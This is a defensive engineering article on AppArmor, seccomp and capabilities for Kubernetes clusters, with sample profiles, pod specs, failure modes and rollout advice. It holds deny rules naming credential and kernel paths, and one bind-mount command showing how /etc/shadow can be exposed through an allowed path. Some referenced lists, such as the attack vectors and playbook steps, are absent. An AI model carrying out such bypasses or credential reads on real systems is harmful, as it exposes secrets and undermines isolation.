Because those controls primarily restrict what a container can ask the kernel to do — not what resources it can access once it's running. AppArmor fills a specific gap in that model:

Control	What it restricts
Capabilities	Privileged kernel operations
Seccomp	Syscall invocation surface
NetworkPolicy	Network ingress/egress paths
AppArmor	Filesystem + kernel object access

For platform teams operating multi-tenant clusters, this gap matters for two distinct reasons:

Containment. A compromised container running under a tight AppArmor profile cannot read /etc/shadow, traverse /proc/*/maps, write to /sys/kernel/**, or access service account tokens it wasn't explicitly granted. The blast radius of a post-exploitation scenario is substantially smaller.

Detection signal. AppArmor denials fire early. When an attacker inside a container attempts reconnaissance — reading process maps, accessing credential paths, probing kernel interfaces — they hit AppArmor rules before they hit application-level controls. In many real incidents, AppArmor denial logs are the first signal that something is wrong, appearing minutes before behavioral anomalies surface in application logs.

Without mandatory access controls like AppArmor or SELinux, a compromised container often has far broader read access to the host filesystem and /proc namespace than platform teams realize — even under PSS Restricted. AppArmor is the layer that makes that access explicit and auditable.

How the Kernel Enforces Security: Not a Pipeline

A common mental model is that capabilities, AppArmor, and seccomp form an ordered enforcement stack. That's a useful simplification, but it's not how the kernel works — and the difference matters when you're reasoning about bypasses.

All three are enforced inside the Linux kernel, but at different enforcement points with different objects:

Capabilities gate privileged operations at the point they're requested (e.g., CAP_NET_BIND_SERVICE before binding to a port below 1024).
Seccomp intercepts syscalls before they execute, using a BPF filter to allow, deny, or trap them.
AppArmor is a Linux Security Module (LSM) that hooks into kernel object access — mediating access to files, sockets, capabilities, and IPC based on a per-process policy.

There is no strict serial pipeline. A process action may be evaluated against all three simultaneously, each at their respective hook point.

AppArmor is uniquely path-aware in a way that neither capabilities nor seccomp are — it can express "this process may read /etc/nginx/** but not /etc/passwd" — which is why it complements rather than duplicates the others.

From Syscall to Enforcement: The Full Execution Path

Before diving into each control individually, it's worth being precise about when each fires. The ordering matters when you're reasoning about bypasses — and it's commonly misunderstood.

When a container process makes a syscall, here's the actual sequence inside the kernel:

User Process
   │
   └── syscall()            ← ring 3 → ring 0 transition
         │
         ├── seccomp filter (classic BPF)
         │        │
         │        ├── KILL / ERRNO / TRAP / NOTIFY → exit here, never reaches kernel
         │        └── ALLOW → continue
         │
         ├── kernel executes syscall logic
         │        │
         │        └── LSM hooks fire (AppArmor / SELinux)
         │                 │
         │                 ├── path / capability / network label check
         │                 └── DENY → EACCES, operation aborted
         │
         ├── capability checks (if privileged op requested)
         │        │
         │        └── e.g. CAP_SYS_ADMIN for mount(), CAP_NET_RAW for raw sockets
         │
         └── actual resource access (filesystem, network, IPC)

The critical implication: seccomp executes before LSM hooks. In most common syscall paths, seccomp is evaluated at syscall entry, followed by LSM hooks (AppArmor/SELinux) and capability checks during operation-specific validation — the exact interleaving varies by syscall and operation type, but the invariant that matters is: a syscall denied by seccomp never reaches the AppArmor evaluation point. Conversely, a syscall allowed by seccomp is still subject to AppArmor's access controls on what that syscall can touch.

Capabilities complete the triad. They're evaluated alongside LSM hooks for many operations and gate the privilege level of what a process can do — independent of both which syscalls it can invoke (seccomp) and which objects it can access (AppArmor). In practice, dropping capabilities is often the simplest way to eliminate entire exploit paths before seccomp or AppArmor need to engage. Dropping CAP_SYS_ADMIN removes more attack surface with one line than most seccomp tuning achieves:

Seccomp → reduce what the kernel will execute
AppArmor → reduce what processes can access
Capabilities → reduce what processes are privileged to do

This is why the three controls are complementary by design, not redundant:

Seccomp answers: can this syscall be invoked at all?
AppArmor answers: given this syscall is allowed, what can it operate on?
Capabilities answers: does this process hold the privilege required for this operation?

A workload with all three configured correctly gets seccomp narrowing the callable surface, capabilities bounding privilege, then AppArmor restricting what permitted syscalls can reach. Remove any layer and the others become your only backstop.

AppArmor reduces blast radius. Seccomp reduces reachable attack surface.

These are different threat properties. Seccomp blocking mount() means the exploit path requiring mount() simply cannot execute — the kernel never sees it. AppArmor can't block a syscall entirely (it operates after kernel entry), but it can block every object that syscall would have reached. They defend different dimensions.

One insight that gets lost in feature comparisons: most container escapes don't bypass all controls — they exploit the gaps between them. CVE-2022-0492 required unshare() and mount() in sequence; seccomp's RuntimeDefault blocked mount(), AppArmor's default profile independently denied it too. Either layer alone would have stopped the exploit. Security failures are rarely about a single mechanism failing — they're about assumptions breaking at the boundaries between seccomp, LSMs, and capabilities. Understanding those boundaries is what this article is actually about.

The Runtime Default Trap

RuntimeDefault is not a single profile. It's an instruction to the container runtime to apply its own default profile — and that profile differs across runtimes.

containerd delegates to the default.profile shipped by the runtime shim.
CRI-O uses a profile derived from the OCI runtime spec with its own modifications.
Docker uses its own docker-default profile (relevant in non-Kubernetes contexts).

Modern runtimes have largely converged on a similar baseline, but differences still exist in rule ordering, abstraction includes, and which operations are allowed. In hardened environments, those deltas matter — you're reasoning about a security envelope you don't fully control.

The only way to get a consistent, auditable security envelope is to manage your own Localhost profiles:

securityContext:
  appArmorProfile:
    type: Localhost
    localhostProfile: my-org/nginx-v2

That localhostProfile value is a path relative to /etc/apparmor.d/ on the node. Which brings us to the hard problem: getting profiles onto nodes reliably.

The platform implication for multi-cluster environments: two clusters running identical pod manifests can have subtly different effective security envelopes depending on their runtime. This creates configuration drift that is largely invisible in CI pipelines — a security review comparing manifests will see the same RuntimeDefault annotation, but the actual enforcement may differ. The only reliable mitigation is to treat profiles as versioned infrastructure and manage them declaratively, as covered in the next section.

Managing Profiles at Scale: Declarative or Nothing

The naive approach is a DaemonSet that writes profile files and runs apparmor_parser -r. This works until it doesn't — profile updates require careful ordering, new nodes joining the cluster won't have profiles until the DaemonSet pod schedules there, and you have no audit trail.

At cluster scale, profile lifecycle must be reconciled declaratively. The Security Profiles Operator (SPO) is currently the most production-ready implementation of that model — a Kubernetes-native controller that manages AppArmor (and seccomp) profiles as first-class CRDs.

SPO reconciles profiles onto nodes, surfaces violations as Kubernetes events, and integrates with OPA/Gatekeeper to enforce that pods only reference profiles that are actually loaded. It also has a --record mode that observes a running workload and generates a profile from its real behavior — invaluable for brownfield workloads.

Here's what a real SPO-managed AppArmorProfile CRD looks like for an nginx container. The Kubernetes metadata section is standard — name and namespace are how pods reference the profile. The spec.policy field is a raw AppArmor policy written in AppArmor's own language, which SPO writes directly to /etc/apparmor.d/ on each node:

apiVersion: security-profiles-operator.x-k8s.io/v1alpha1
kind: AppArmorProfile
metadata:
  name: nginx-restricted       # pods reference this name in appArmorProfile.localhostProfile
  namespace: production        # profile is scoped to this namespace
spec:
  policy: |
    #include <tunables/global>  # defines @{PROC}, @{HOME} and other path variables
    profile nginx-restricted flags=(attach_disconnected) {
      # attach_disconnected: allow profile to apply even if the binary path
      # isn't reachable at load time (common in containers with overlayfs)

      #include <abstractions/base>        # allows libc, locale files, /dev/null etc.
      #include <abstractions/nameservice> # allows DNS resolution (/etc/resolv.conf, nsswitch)

      # Allow outbound TCP only — no UDP, no raw sockets
      network inet tcp,
      network inet6 tcp,

      # Binary: map+read+execute (mr). Denies writes to the nginx binary itself.
      /usr/sbin/nginx mr,

      /etc/nginx/** r,          # read-only access to all nginx config files
      /var/log/nginx/** w,      # write access for access/error logs
      /var/cache/nginx/** rw,   # read+write for proxy cache and temp files
      /tmp/** rw,               # read+write for nginx temp upload/body buffers

      # Explicit denials — these take precedence over any allow rules above
      deny /proc/sys/kernel/core_pattern w,  # prevent overwriting core dump handler (container escape vector)
      deny @{PROC}/*/mem rw,                 # prevent reading/writing any process's memory
      deny /sys/** w,                        # prevent writing to sysfs (kernel tunable manipulation)
    }

Writing a Real Profile: The Rule Model

AppArmor rules follow a simple pattern: [qualifier] [resource] [permissions]. But the devil is in the details — particularly the path model.

# File rules
/etc/nginx/** r          # read all files under /etc/nginx
/var/log/nginx/*.log w   # write to log files
/tmp/nginx-*/ rw         # read/write temp directories
/run/nginx.pid rw        # read/write PID file

# Capability rules
capability net_bind_service,   # allow binding to ports < 1024
capability dac_override,       # override file permission checks (avoid if possible)

# Network rules
network inet tcp,
network inet6 tcp,
deny network raw,              # deny raw sockets explicitly

# Deny dangerous kernel paths explicitly
deny /proc/sys/kernel/** w,
deny @{PROC}/*/maps r,         # prevent reading process memory maps (explicit deny required)

A profile worth deploying has explicit deny rules, not just allowances. The deny keyword takes precedence over allow rules and is your backstop against profile inheritance tricks. Default-deny with explicit allows is the correct mental model.

The Path-Based Trap

AppArmor evaluates rules against resolved path strings, not inodes. This is a non-obvious but important limitation.

If an attacker inside a container can manipulate how paths resolve — through bind mounts, symlinks, or mount namespace tricks — they may be able to access a file via an allowed path that reaches an inode your policy intended to restrict. For example:

# If /allowed-dir is permitted and an attacker can bind-mount /etc/shadow there:
mount --bind /etc/shadow /allowed-dir/shadow   # now readable via allowed path

Well-written profiles must pair with readOnlyRootFilesystem: true and careful namespace configuration to close this class of bypass. It's not a reason to avoid AppArmor, but it's a reason to understand what you're actually enforcing.

Generating a starting profile: Use aa-genprof to record behavior in complain mode, then tighten from there. For containers, SPO's --record mode is cleaner.

# Load a profile in complain mode (logs denials, doesn't enforce)
apparmor_parser -C /etc/apparmor.d/my-profile

# Watch would-be denials in real time
journalctl -k -f | grep apparmor

What AppArmor Won't Stop

This is the section most blog posts skip.

AppArmor Coverage vs. Threat Severity

  HIGH  │ ✗ Kernel CVE bypass          ║ ✓ Cgroup release_agent escape  
        │ ✗ In-memory / ROP chain      ║ ✓ Write to /sys or /proc/kernel 
S       │ ✗ Network exfiltration       ║ ✓ Service account token read    
E       │ ✗ Misloaded profile (silent) ║ ✓ Read /proc/*/maps (recon)     
V       │ ✗ Path traversal/bind mount  ║                                  
E  ─────┼──────────────────────────────╫────────────────────────────────
R       │                              ║                                  
I       │      (no threats here —      ║ ✓ Raw socket creation            
T       │       low severity threats   ║                                  
Y       │       not covered by AA      ║                                  
        │       are acceptable risk)   ║                                  
  LOW   │                              ║                                  
        └──────────────────────────────╨────────────────────────────────
                LOW COVERAGE                   HIGH COVERAGE
                              ◄── AppArmor Coverage ──►

  ✗ = AppArmor does NOT cover this threat (needs other controls)
  ✓ = AppArmor blocks this (if profile is correctly written)

Network exfiltration: AppArmor can allow or deny protocol families (TCP, UDP, raw) but has no concept of destination IPs or domains. A process with network inet tcp allowed can exfiltrate data to any external endpoint. That's NetworkPolicy's domain — and the two must work together.

In-memory attacks: AppArmor is path-based and capability-based. It has no visibility into what happens in memory. A process with permitted capabilities can still execute heap sprays, ROP chains, or in-process exploitation. Runtime detection tools like Falco or Tetragon — which observe syscall patterns using eBPF — are the right layer for this.

Kernel vulnerabilities: AppArmor is a kernel module that hooks via LSM interfaces. An exploit that compromises the kernel below those hooks bypasses AppArmor entirely. CVE-2022-0185 (a kernel heap overflow enabling container escape) is a real example — no AppArmor profile would have stopped it because the exploit occurred before LSM enforcement points were reached.

Misloaded profiles: Depending on your runtime version and Kubernetes version, a missing Localhost profile may either cause pod admission failure or allow the container to start without confinement. This variance is precisely why profile lifecycle management must be automated — the SPO's status reporting makes this observable; bare annotation approaches fail silently.

Path-based bypasses: As described above — bind mounts and mount namespace manipulation can cause policy to evaluate against a path that resolves to an unintended inode.

AppArmor vs. Seccomp vs. SELinux: An Opinionated Take

These three are frequently described as interchangeable. They're not — they enforce different things at different kernel hook points.

Choosing AppArmor vs. SELinux at Platform Level

Most platform teams don't choose between AppArmor and SELinux for purely technical reasons. They choose based on node OS standardization — which is already determined before the security conversation happens.

Node OS	MAC default	Practical choice
Ubuntu / Debian	AppArmor	Use AppArmor
RHEL / CentOS / OpenShift	SELinux	Use SELinux
Heterogeneous (both)	Neither by default	Pick one, standardize

The operational cost of running both MAC engines across heterogeneous nodes — maintaining separate toolchains, policy languages, expertise, and audit pipelines — almost always outweighs any technical benefit. In practice, consistency of tooling and policy management matters more than the underlying MAC engine.

Control Failure Mode Comparison

This is the table most comparison posts omit: not what each control does, but what each control fails to stop.

Scenario	Seccomp	AppArmor	Why
Block `mount()` entirely	✅	❌	Seccomp can block the syscall number; AppArmor mediates objects, not syscall invocation
Restrict `/etc/passwd` reads	❌	✅	Seccomp can't dereference path arguments; AppArmor is path-aware
Stop kernel exploit (pre-LSM)	❌	❌	Both operate inside the kernel; pre-hook exploits bypass both
Stop `open()` misuse on allowed fd	❌	✅	Seccomp allows `open()` broadly; AppArmor restricts what it can open
Block namespace-creating `clone()`	✅	❌	Argument filtering on `clone` flags; AppArmor doesn't intercept syscall invocation
Prevent network exfiltration	❌	⚠️ Partial	Seccomp can't; AppArmor can block protocol families but not destinations
Detect in-memory exploits	❌	❌	Neither has memory visibility; needs Falco/Tetragon

The table makes one thing clear: these two controls have almost no overlap in what they stop. They're not alternatives — they're complements covering different axes of the attack surface.

When Is seccomp Alone Enough?

Seccomp RuntimeDefault blocks syscalls that are rarely needed and frequently abused — keyctl, kexec_load, ptrace, mount, unshare, and others. For many workloads, this provides the most impactful risk reduction per unit of operational effort.

Add AppArmor when:

You need path-level access control (restrict reads to specific filesystem subtrees)
You're running multi-tenant workloads and need isolation between namespace tenants
You need explicit capability access control beyond what the Pod securityContext expresses
You're building toward a compliance posture that requires MAC

Stay with seccomp-only when:

Your nodes are heterogeneous (mixed OS) and profile management would span both engines
Your workloads are internal tooling with low breach impact
The operational cost of profile lifecycle management exceeds your team's capacity

The right answer is not "AppArmor everywhere" — it's "AppArmor where the containment value exceeds the operational cost."

LSM Stacking: The Frontier

Modern Linux kernels (5.7+) support LSM stacking, which means AppArmor, SELinux, BPF-LSM, and Landlock can coexist in the same kernel, each enforcing at their respective hooks — though the exact combinations available depend on kernel configuration and distribution defaults. In hardened environments where stacking is supported, this enables layered MAC enforcement that goes well beyond any single module.

Tetragon takes this further: where AppArmor is a static policy engine evaluated at access time, Tetragon uses eBPF to enforce dynamic policy based on runtime context — process ancestry, argument values, network connection state — things AppArmor cannot express. If you're running Tetragon, AppArmor and eBPF enforcement are complementary, not competing.

The practical answer for most clusters: seccomp everywhere as a syscall filter, AppArmor on Ubuntu/Debian nodes for filesystem and capability restrictions, and SELinux on RHEL-based nodes. On kernel 5.7+, investigate BPF-LSM for workloads that need dynamic policy.

Seccomp: Deeper Than You Think

The comparison section above treats seccomp as a peer of AppArmor. It is — but most engineers use it at a much shallower level than AppArmor because the documentation stops at "configure RuntimeDefault and move on." Here's what staff-level seccomp understanding looks like.

The cBPF Filter Model

Seccomp filters are classic BPF (cBPF) programs, not eBPF. This distinction matters:

Filters are compiled into a set of instructions evaluated in kernel context on every syscall entry
Execution is intentionally constrained: no loops, bounded instruction count, no memory allocation
This constraint is a feature — it guarantees the filter cannot hang or crash the kernel

Unlike eBPF observability tools (Falco, Tetragon) which can maintain maps, call helper functions, and do complex processing, a seccomp filter is a simple decision function: given this syscall number and these argument values, return an action. That simplicity is why seccomp is evaluated first — before any LSM hook, before capability checks, before kernel logic runs at all.

The filter is attached per-process (inheritable by children) and evaluated on every syscall entry. Attaching a filter requires CAP_SYS_ADMIN or the no_new_privs bit to be set — which is why allowPrivilegeEscalation: false is a prerequisite to meaningful seccomp enforcement.

Return Actions (More Than Allow/Deny)

RuntimeDefault uses SCMP_ACT_ERRNO for blocked syscalls. But seccomp has a richer action set that custom profiles can leverage:

Action	Behavior	Use Case
`SCMP_ACT_ALLOW`	Syscall proceeds	Normal operation
`SCMP_ACT_ERRNO`	Returns configurable errno	Default for RuntimeDefault; graceful failure
`SCMP_ACT_KILL_PROCESS`	Immediately kills the process	Highest-risk syscalls (`ptrace`, `kexec_load`)
`SCMP_ACT_LOG`	Logs the syscall, allows it	Audit mode — building a profile from production traffic
`SCMP_ACT_TRACE`	Notifies a ptrace tracer	Policy development tooling
`SCMP_ACT_NOTIFY`	Sends event to userspace supervisor via fd	See below

The most powerful and least-known action is SCMP_ACT_NOTIFY (introduced in kernel 5.0). It sends the syscall event to a userspace supervisor via a file descriptor — the container's syscall is paused until the supervisor makes a decision. This turns seccomp into a programmable enforcement point: a policy engine can inspect the syscall's arguments, look up process context, consult external state, and then approve or deny — all before the kernel executes anything. This is how tools like sysbox implement OCI-compliant syscall interception without full gVisor overhead.

For most Kubernetes workloads you'll never need SCMP_ACT_NOTIFY, but understanding it exists clarifies what seccomp is: not just a static blocklist, but a kernel-userspace interception interface with real programmability.

Argument Filtering: The Underused Power Feature

Most engineers know seccomp filters on syscall numbers. Fewer know it can filter on syscall arguments.

Seccomp's cBPF instructions can inspect the syscall argument registers. This enables policies like:

{
  "syscalls": [
    {
      "names": ["clone"],
      "action": "SCMP_ACT_ALLOW",
      "args": [
        {
          "index": 0,
          "value": 2114060288,
          "op": "SCMP_CMP_MASKED_EQ"
        }
      ]
    }
  ]
}

Concretely, argument filtering enables:

Allow open() for read-only, deny write: check the flags argument for O_RDWR or O_WRONLY
Block clone() with namespace-creating flags: the RuntimeDefault profile already does this — it doesn't block clone entirely (threads need it), it blocks the CLONE_NEWUSER / CLONE_NEWNS flag combinations that enable container escapes
Restrict prctl() operations: allow PR_SET_NAME (used by many runtimes), block PR_SET_DUMPABLE and PR_CAP_AMBIENT

Argument filtering is how RuntimeDefault blocks namespace-creating clone() without breaking thread creation in multithreaded applications — a subtlety that gets lost in "seccomp blocks 44 syscalls" summaries.

Two Non-Obvious Properties

Seccomp filters are per-thread, not per-container. The filter is attached to a process and inherited by threads and child processes. In multithreaded applications, each thread runs under the same filter — but thread-specific behavior (signal handling, JVM internal threads, async runtimes) can produce syscall patterns that weren't covered during profile generation. JVM profiling windows that only observed the main application thread frequently miss the GC thread's madvise and mmap patterns.

Seccomp is not namespace-aware. The filter applies equally regardless of which container, namespace, or cgroup the thread belongs to. A seccomp filter attached to a process doesn't know it's running inside a container. This is both a strength (it can't be bypassed by namespace tricks) and a limitation (you can't express "allow mount() inside the container's mount namespace but deny it in the host namespace" — that distinction lives in the capability and LSM layers, not seccomp).

What Seccomp Won't Stop

Seccomp has no concept of paths. It sees openat(AT_FDCWD, "/etc/shadow", O_RDONLY) as a permitted openat syscall — unless you've also checked the path argument. But path arguments are memory pointers, not inline values, and cBPF can't dereference pointers. Seccomp fundamentally cannot enforce path-level access control. That's AppArmor's domain.

Seccomp cannot enforce stateful policies. Each syscall decision is independent. Seccomp cannot say "allow the first open() to this fd but deny the third" or "allow connect() unless the previous execve() was suspicious." For stateful, context-aware enforcement, you need eBPF-based tools (Tetragon) or SCMP_ACT_NOTIFY with a userspace supervisor.

Seccomp cannot prevent allowed syscall abuse. If write() is allowed and an attacker has an open fd to a sensitive file, seccomp won't stop the write. Allowing a syscall means allowing it — what it operates on is AppArmor's responsibility.

Argument filtering has coverage limits. Pointer arguments (file paths, struct pointers) cannot be dereferenced by cBPF. Only integer-valued arguments (flags, fd numbers, mode values) can be reliably checked.

Seccomp answers "can this syscall be invoked?" but not "what does this syscall operate on?"

A Threat Scenario: Container Escape Attempt

Let's make this concrete. An attacker has achieved code execution inside a container via a deserialization vulnerability. What happens?

Note that attack vector 2 is only blocked if you've explicitly added deny @{PROC}/*/maps r to your profile. Many RuntimeDefault profiles do not include this denial. This is a good example of why "we have AppArmor" and "we have AppArmor enforcing what we think it is" are different claims.

What Breaks First in Production

Theory is necessary. Operational experience is different. Here's what actually causes profile-related incidents:

Java and JVM workloads write to unexpected temp paths at startup — often derived from system properties and JDK version. A profile tight enough to deny /tmp/hsperfdata_* will break JVM health checks. Generate profiles from running workloads, not from documentation.

Dynamic language runtimes (Python, Ruby, Node.js) load shared libraries and modules from paths that vary by distribution and package version. /usr/lib/x86_64-linux-gnu/** may need to be explicitly allowed, and that path is distribution-specific.

Sidecars accessing shared volumes: If your app container and a sidecar (e.g., an Envoy proxy or log shipper) share an emptyDir, both containers need profiles that permit access to that volume's underlying path. The actual path under /var/lib/kubelet/pods/ is unpredictable — use @{run} and path globs carefully, or use a dedicated volume mount path that's consistent.

Health and readiness probes: Kubernetes exec probes run inside the container's process namespace. If your probe invokes /bin/sh or /bin/curl and your profile restricts shell execution, probes will fail. Either allow the probe binary explicitly or switch to HTTP/TCP probes that don't require exec.

Profile load ordering on node startup: If a node reboots and the SPO pod hasn't yet reconciled profiles before a workload pod schedules, the workload pod may fail admission. Build node readiness checks that verify profile presence, or use pod disruption budgets and node cordoning during maintenance windows.

Performance Considerations

AppArmor's overhead is generally low, but not zero, and it scales with profile complexity.

The cost is incurred at file open, exec, and network operations — each requires an LSM hook traversal and a policy lookup. For most workloads, this is imperceptible. For workloads doing high-frequency file I/O (logging pipelines, database engines, build systems), a dense profile with many path rules can add measurable latency to path lookups.

Practical guidance: keep profiles focused. A profile with 20 precise rules is faster and easier to audit than one with 200 broad globs. Avoid /** catch-alls on performance-sensitive paths — use specific subtree rules. And in complain mode, audit noise from high-frequency deny events can itself affect throughput; don't leave workloads in complain mode indefinitely.

A Production-Grade Pod Spec

apiVersion: v1
kind: Pod
metadata:
  name: hardened-app
  namespace: production
spec:
  automountServiceAccountToken: false  # disable default SA token mount — most pods don't need API access
  securityContext:                     # pod-level: applies to all containers
    runAsNonRoot: true                 # kubelet rejects the pod if the image runs as UID 0
    runAsUser: 1001                    # explicit UID — avoid root (0) and well-known service UIDs
    runAsGroup: 1001                   # primary GID for the process
    fsGroup: 1001                      # volume files are chowned to this GID on mount
    seccompProfile:
      type: RuntimeDefault             # use the container runtime's built-in seccomp profile (~44 blocked syscalls)
                                       # move to Localhost + custom profile for high-security workloads
  containers:
  - name: app
    image: my-org/app:1.4.2           # pin to digest in production; tags are mutable
    securityContext:                   # container-level: overrides pod-level where both exist
      appArmorProfile:
        type: Localhost                # use a node-loaded custom profile, not RuntimeDefault
        localhostProfile: my-org/app-v1  # path relative to /etc/apparmor.d/ — must be loaded by SPO before pod starts
      allowPrivilegeEscalation: false  # prevents setuid binaries and sudo from granting more privilege than the parent
      readOnlyRootFilesystem: true     # container filesystem is immutable — writes go only to explicit volume mounts
      capabilities:
        drop:
        - ALL                          # drop every capability Linux grants by default
        add:
        - NET_BIND_SERVICE             # re-add only if binding to ports < 1024; remove if app uses port >= 1024
    volumeMounts:
    - name: tmp
      mountPath: /tmp                  # writable scratch space — required by many runtimes even under readOnlyRootFilesystem
    - name: cache
      mountPath: /var/cache/app        # app-specific writable path; scope this as narrowly as possible
  volumes:
  - name: tmp
    emptyDir: {}                       # ephemeral, node-local; wiped on pod restart — not for persistent data
  - name: cache
    emptyDir: {}                       # same — both volumes exist only to satisfy readOnlyRootFilesystem

A few non-obvious choices: automountServiceAccountToken: false removes the default credential most pods get but rarely need. The emptyDir volumes provide writable space within a readOnlyRootFilesystem: true constraint — without them, many runtimes crash on startup trying to write to /tmp. Drop ALL capabilities and add back only what's needed; NET_BIND_SERVICE is the only one most web services require.

Note also what Restricted PSS enforces at admission: it validates that appArmorProfile is present and set to RuntimeDefault or Localhost, but it does not validate the strength or content of the referenced profile. Admission compliance and actual security posture are not the same thing.

Observability: Catching Denials Before They Become Incidents

AppArmor logs to the kernel audit subsystem:

# Live denial stream
journalctl -k -f | grep 'apparmor="DENIED"'

# Example denial entry
kernel: audit: type=1400 audit(1708012345.123:42): apparmor="DENIED"
  operation="open" profile="my-org/app-v1"
  name="/proc/1/maps" pid=12345 comm="sh" requested_mask="r"
  denied_mask="r" fsuid=1001 ouid=0

Distinguishing seccomp denials from AppArmor denials is a practical skill that gets skipped in documentation. They surface differently:

	Seccomp denial	AppArmor denial
Syscall result	`EPERM` or `ENOSYS` (configurable)	`EACCES` (access denied)
Kernel log	None by default (use `SCMP_ACT_LOG` to enable)	Visible in `dmesg` and audit log immediately
Log format	No `apparmor=` field; show up only if `SCMP_ACT_LOG` action used	`apparmor="DENIED"` with `operation`, `profile`, `name`, `comm` fields
How to distinguish	Application sees EPERM but nothing in `journalctl -k	grep apparmor`

When a container fails with Operation not permitted and you see nothing in the AppArmor audit log, seccomp is the likely culprit. Add SCMP_ACT_LOG to your profile's unknown syscalls during profiling to surface them — the Security Profiles Operator's --record mode does this automatically.

The operation, profile, name, and comm fields tell you exactly what was denied, by which profile, from which binary. When a denial fires, the triage path matters:

A denial from a known binary hitting a path the app shouldn't need is a high-fidelity signal — treat it as an incident until proven otherwise. Feed these logs into your SIEM(Security Information and Event Management) with a volume-based alert on any single pod.

Compliance Mapping

Control	Standard	Requirement
Mandatory Access Control	CIS Kubernetes Benchmark 5.7.4	Apply security context to pods/containers
Least privilege file access	NIST SP 800-190 §4.3.1	Limit container runtime privileges
Restrict kernel capabilities	PCI DSS v4 Req 6.4	Protect systems from known vulnerabilities
Restrict syscall surface	SOC 2 CC6.1	Logical access controls
Pod Security Standards (Restricted)	Kubernetes native	`appArmorProfile` must be `RuntimeDefault` or `Localhost`

Note the gap: compliance frameworks check for the presence of controls, not their effectiveness. PSS Restricted enforces that a profile is declared, not that it actually restricts anything meaningful. That's your team's responsibility to close.

A Realistic Failure Postmortem

Understanding where AppArmor goes wrong in practice is as important as knowing how to configure it. Here's a failure mode that plays out more often than it should.

A platform team deploys a new microservice to production. They've done the right things: a custom Localhost profile, authored from SPO's recorded output in staging, reviewed and tightened before go-live. The deployment succeeds. Pods are running. And then, three hours later, Kubernetes starts restarting pods due to failing readiness probes.

What went wrong: The profile was generated from the application process's behavior, but exec probes spawn a separate shell inside the container that the profiling run never observed. The profile correctly represented the app — but not all the processes Kubernetes would run inside it.

The compounding failure: Under pressure at 2am, the team set type: Unconfined and moved on. That pod has been running without AppArmor enforcement for six months. Nobody notices because it's not visible in normal kubectl output.

The systemic lesson: The root issue was not the profile itself — it was the rollout process. Security controls fail most often during deployment, not during steady state operation. The failure mode is predictable: profiles generated from synthetic or incomplete observation windows miss edge cases, and the incident response path of least resistance is to disable the control entirely.

Treat AppArmor enforcement like any other breaking infrastructure change: progressive rollout, canary namespaces, and automated rollback to complain mode — not to Unconfined.

The right rollout strategy:

Deploy to a canary namespace with the profile in complain mode first (flags=(complain)), even if you generated it from production traffic.
Monitor denials for 24–48 hours across all probe types, init containers, and sidecar interactions.
Promote to enforce mode only after the denial stream is clean.
If enforcement causes an incident, roll back to complain mode — never to Unconfined. Complain mode preserves the security signal while restoring service.
Treat a post-incident Unconfined pod as technical debt with a ticket, not a resolved incident.

The lesson isn't that AppArmor is fragile. It's that profile coverage must be validated against everything the kernel will run in a container, not just the application binary.

AppArmor's Threat Model Boundary

AppArmor is a meaningful control within a specific set of assumptions. Outside those assumptions, it provides weaker or no protection. Being explicit about this boundary is what separates operational security from security theater.

The most common way these assumptions break silently in real clusters:

A team runs a debug container with privileged: true to diagnose an incident and never removes it.
A legacy workload requires hostPath mounts that weren't caught in policy review.
A node autoscaler provisions a new node type whose image doesn't have the SPO-managed profiles loaded.
An operator chart sets appArmorProfile: type: Unconfined for convenience during development and the override is never removed before promotion.

None of these are AppArmor failures. They're assumption violations. The control is only as strong as the assumptions underneath it — which is why security posture reviews should explicitly verify these preconditions, not just check that the field is set.

The Operational Cost of AppArmor

The real cost of AppArmor is not performance overhead — it's policy maintenance.

Every Localhost profile you deploy becomes part of your platform's API surface. Applications depend on it. Admission controllers enforce its presence. And unlike most Kubernetes configuration, profile changes can silently break applications in ways that only surface under specific runtime conditions.

The ongoing maintenance surface that teams underestimate:

Profile lifecycle management — profiles must be versioned, reviewed, and retired as applications evolve. A profile that was accurate at authoring time may be wrong after a dependency upgrade or JDK version change.
Runtime compatibility — when containerd or CRI-O ships a new version, default behavior can shift. Profiles that relied on implicit runtime behavior may need updates.
Sidecar and probe coverage — every new sidecar (Envoy, log shipper, OTel collector) added to a namespace needs its own profile or must be explicitly covered. Forgetting this is how Unconfined exceptions accumulate.
Exception management under pressure — during incidents, the fastest resolution is always to disable the control. Without a clear policy on what constitutes a legitimate exception (and a process for revisiting it), profiles erode over time.

Without automation — SPO for lifecycle, GitOps for change tracking, SIEM alerts for denial spikes — AppArmor deployments tend to degrade into one of two failure modes: overly permissive profiles that allow nearly everything, or growing lists of Unconfined exceptions added during incidents and never revisited.

The question for platform teams is not "should we use AppArmor?" but "do we have the operational infrastructure to maintain it at the security level it needs to operate?"

Common Anti-Patterns

These are the patterns that undermine AppArmor in production, across organizations that have done the work to deploy it.

Treating RuntimeDefault as "secure enough." It's a reasonable baseline, but it's not a security posture. RuntimeDefault does not restrict filesystem access, doesn't prevent reading /proc/*/maps, and varies across runtimes. It's a starting point, not a destination.

Generating profiles from synthetic or short-observation traffic. A profile generated from 30 minutes of staging traffic will miss weekly batch jobs, on-call runbook paths, slow-startup JVM behavior, and any probe interactions that didn't fire during the window. Observation windows must cover full operational cycles — including failure modes.

Running security controls only in production. Profiles validated only in production are profiles you can't roll back safely. Complain mode in staging, enforce in production, with CI comparison of denial delta between environments.

Setting Unconfined during incidents and not reverting. This is the most common way security posture degrades silently. Every Unconfined exception added under pressure is a permanent policy rollback unless tracked and scheduled for follow-up.

Not auditing profile drift. Applications change. Profiles don't automatically change with them. An 18-month-old profile for a service that has been through three dependency upgrades is almost certainly wrong — either too permissive (allowing paths the app no longer needs) or insufficiently permissive (missing paths added in newer dependencies).

Alerting on absolute denial counts rather than deviation. Some workloads produce steady, low-level denial noise from probe edge cases or library behavior. Alerting on any denial will exhaust on-call teams; alerting on zero denials misses real events. Baseline first, then alert on deviation.

Platform Team Playbook

If you operate Ubuntu-based Kubernetes nodes and are building or hardening your security posture, here's a concrete sequence. This isn't theory — it's the operational order that reduces the risk of each step breaking what the previous step protected.

A few implementation notes on the less obvious steps:

Step 1 before AppArmor: Seccomp RuntimeDefault is lower risk, higher portability, and easier to validate. Getting it in first means AppArmor is hardening a surface that's already narrowed. Don't try to do both simultaneously — sequence reduces blast radius.

Step 4 duration matters: 48 hours is a minimum. If your workload has weekly batch jobs, cron patterns, or on-call runbooks that trigger unusual paths, you need observation windows that cover those cycles. A profile generated from one hour of traffic will miss them.

Step 7 baselining: Before you alert on denial spikes, you need to know what "normal" looks like. Some workloads legitimately produce periodic denials from probe edge cases or library behavior that's been allowed to be noisy. Baseline first, alert on deviation — not absolute counts.

